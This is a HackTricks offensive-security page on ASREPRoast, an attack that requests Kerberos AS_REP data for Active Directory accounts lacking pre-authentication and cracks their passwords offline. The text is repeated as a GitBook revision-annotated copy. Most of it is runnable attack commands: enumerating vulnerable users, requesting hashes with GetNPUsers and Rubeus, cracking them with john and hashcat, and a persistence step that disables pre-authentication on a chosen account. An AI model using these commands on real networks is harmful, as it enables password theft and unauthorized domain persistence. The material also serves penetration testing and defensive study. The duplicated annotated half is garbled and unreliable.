hacktricks/windows/active-directory-methodology/asreproast.md

# ASREPRoast

## ASREPRoast

The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT_REQ_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain.** Otherwise usernames have to be guessed**.

#### Enumerating vulnerable users (need domain credentials)

```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```

#### Request AS_REP message

{% code title="Using Linux" %}
```bash
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
{% endcode %}

{% code title="Using Windows" %}
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}

### Cracking

```
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
```

### Persistence

Force **preauth **not required for a user where you have **GenericAll **permissions (or permissions to write properties):

```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```

****[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)****
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# ASREPRoast`

			`## ASREPRoast`

GitBook: [#2874] update basic github 2021-11-30 13:55:54 +00:00			`The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute ([_DONT_REQ_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_)_.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2874] update basic github 2021-11-30 13:55:54 +00:00			`That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2874] update basic github 2021-11-30 13:55:54 +00:00			`Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`#### Enumerating vulnerable users (need domain credentials)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView`
			```

GitBook: [#2874] update basic github 2021-11-30 13:55:54 +00:00			`#### Request AS_REP message`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`{% code title="Using Linux" %}`
			```bash
			`#Try all the usernames in usernames.txt`
			`python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast`
			`#Use domain creds to extract targets and target them`
			`python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast`
			```
			`{% endcode %}`

			`{% code title="Using Windows" %}`
			```bash
			`.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast`
			`Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)`
			```
			`{% endcode %}`

			`### Cracking`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`john --wordlist=passwords_kerb.txt hashes.asreproast`
			`hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt`
			```

			`### Persistence`

GitBook: [#2874] update basic github 2021-11-30 13:55:54 +00:00			`Force preauth not required for a user where you have GenericAll permissions (or permissions to write properties):`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose`
			```

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`**[More information about AS-RRP Roasting in ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)**`